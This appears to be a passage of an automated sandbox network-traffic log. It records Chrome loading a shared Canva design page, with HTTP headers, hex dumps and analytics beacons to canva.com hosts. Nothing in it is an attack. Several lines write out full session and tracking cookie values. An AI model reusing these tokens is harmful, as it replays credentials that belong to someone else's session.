                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC405OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 30 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 36 2e 31 30 32 2e 31 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 2f
                                                                                                                                                                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":1707,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.16.102.112","status_code":404,"type":"http.error"},"type":"network-error","url":"https://www.canva.com/
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    date: Thu, 19 Dec 2024 21:27:36 GMT
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    63192.168.2.449815104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC710OUTGET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Range: bytes=187599-187599
                                                                                                                                                                                                                                                    If-Range: "654ba7fa32ccfd8c24e11f29b7156a34"
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC1278INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:37 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Range: bytes 187599-187599/194188
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a496a3b1875-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1764970
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "654ba7fa32ccfd8c24e11f29b7156a34"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:37 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:05 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: byhTNi18i6PM1HLlAcI2MglY5O3OdMD4fE6B6rgOt4kY02Yrb+/GWDcdgD3e3zDW75oJxNVfNNk=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: FYPHXPBW3FEP3H18
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: a7U_7Jx2xEmFYTgvPDOeb4VpAX2RwGex
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC783INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 46 47 65 6c 43 70 6f 46 69 71 4a 4f 35 68 39 4b 49 70 4c 42 49 4a 4e 4c 61 6c 35 77 50 5f 61 76 41 67 68 6e 5a 39 72 54 77 61 30 2d 31 37 33 34 36 34 33 36 35 37 2d 31 2e 30 2e 31 2e 31 2d 68 34 59 61 57 7a 78 7a 4c 6b 6b 6f 42 59 54 4c 4f 51 58 43 56 52 44 31 32 74 79 57 33 78 6d 4b 57 5a 66 53 58 61 61 69 58 5f 37 34 78 41 44 6b 33 36 6f 7a 31 56 34 55 6a 5a 69 66 50 32 4b 59 45 31 4c 6a 76 4f 30 53 5f 32 6d 33 4a 67 72 6b 71 59 61 42 4b 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 37 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=FGelCpoFiqJO5h9KIpLBIJNLal5wP_avAghnZ9rTwa0-1734643657-1.0.1.1-h4YaWzxzLkkoBYTLOQXCVRD12tyW3xmKWZfSXaaiX_74xADk36oz1V4UjZifP2KYE1LjvO0S_2m3JgrkqYaBKw; path=/; expires=Thu, 19-Dec-24 21:57:37 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC1INData Raw: ae
                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    64192.168.2.449816104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC1663OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC1075INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a4968c618ea-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a4968c618ea
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3E6vkSLwwFx24qWf%2FMCJz%2B95SqhCDghU9x5kFD6eVHoUan8Nzk2mN6y8%2Fp5mJeFzZX3cG9kTLkrkx62NETYqWiJo0VAMOz%2FnEYM%2Bjda1NKj3fSEDTLCfchp2sYq9Xw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    65192.168.2.449818216.239.38.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC2668OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514845&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; _ga=GA1.1.2124219403.1734643655
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=2T%2FHjvwIcR1Yv1KUZyE1XM3g5yHM7Ueg6SXwK98npqpmNPGujqz283%2BH7z3YXCGTaBOYrY6iImyNJB3UfgG0MAfgwR%2By6OkRC1F0AamReO7sX9JXuMFwmDYBaQJ%2FiQ%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC735INData Raw: 33 63 62 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 32 34 37 32 33 30 36 31 34 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25
                                                                                                                                                                                                                                                    Data Ascii: 3cbevent: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC243INData Raw: 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25 32 46 64 65 73 69 67 6e 25 32 46 64 65 73 69 67 6e 2d 69 64 25 32 46 61 63 63 65 73 73 2d 63 6f 64 65 25 32 46 76 69 65 77 25 33 46 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 44 41 47 5a 78 45 4a 4d 49 41 30 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 64 65 73 69 67 6e 73 68 61 72 65 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6c 69 6e 6b 32 25 32 36 75 74 6d 5f 73 6f 75 72 63 65 25 33 44 75 6e 69 71 75 65 6c 69 6e 6b 73 25 32 36 75 74 6c 49 64 25 33 44 68 64 63 64 65 63 38 65 64 34 61 3f 22 5d 2c 22 6f 70 74 69 6f 6e 73 22 3a 7b 22 61 74 74 72 69 62 75 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: tps%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a?"],"options":{"attribution_reporting":true}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC928INData Raw: 33 39 39 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 32 34 37 32 33 30 36 31 34 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25 32 46 64 65 73 69 67 6e 25 32 46 64 65 73 69 67 6e 2d 69 64 25 32
                                                                                                                                                                                                                                                    Data Ascii: 399event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    66192.168.2.449819216.239.38.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC2644OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514863&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custo [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC675INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=CEzz%2BzYwahaIt5v168ErcRhEArlc8rqNzSzYP6PT3%2B1RpLkb%2FhQGUjBImUq33uceeeZR4CuicX8bhud0H4M3dnub114H%2FOCjl5%2BISM9wCKXFmuJxeFLOK97PuKYGUQ%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
